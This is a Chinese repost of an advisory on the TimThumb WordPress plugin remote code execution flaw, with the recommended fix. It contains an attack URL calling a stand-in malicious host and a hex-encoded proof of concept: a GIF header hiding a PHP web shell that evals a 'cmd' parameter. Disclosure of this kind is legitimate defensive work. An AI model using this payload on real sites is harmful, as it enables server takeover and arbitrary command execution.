WordPress 严重的远程备份执行代码漏洞

timthumb插件的问题,通过制订特殊的图像文件,用一个有效MIME-type前面加一个PHP文件

最后,它可能要使TimThumb相信它

是一个正常的图片,因此缓存在缓存目录。

攻击URL:(注!一些网站使用Base64编码 of the src GET-request)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

存储文件的目标:(这可能会从主机的主机。)

1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 

1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); 

md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

影响版本:1.* - 1.32(版本为1.19和1.32)进行检测。(1.33版没有保存缓存文件作为.php)
 

概念性的证明文件:

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>

WordPress 严重的远程备份执行代码漏洞_第1张图片
好多黑客大牛的博客多被日了。快检查哦!!!!

解决方案::::

更新的最新的版本是1.34或者删除timthumb文件。

PS:timthumb插件的问题,好多CMS或者博客多死在插件的漏洞上面,

所以大家还是少装点插件,能用代码解决应当要用插件。这次的问题比较严重,能

直接上传webshell。插件名称:Wordpress Timthumb一款缩略图功能的插件。

漏洞文件:timthumb.php,该文档定义了数个可以远程提取的相册,但脚本并没有

很好地验证这些域名,因此类似“http://flickr.com.maliciousdomain.com”这样的

欺骗性二三级域名也会被通过,所以黑客理论上可以用任何域名后缀轻松仿冒,

并通过缓存目录上传各种恶意程序。

软件链接:http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php    (版本号:1.32)

扩展阅读:http://sebug.net/exploit/20811/

作者:MaXe,由情整理编辑。

 



 

你可能感兴趣的:(职场,wordpress,休闲,远程备份,代码漏洞)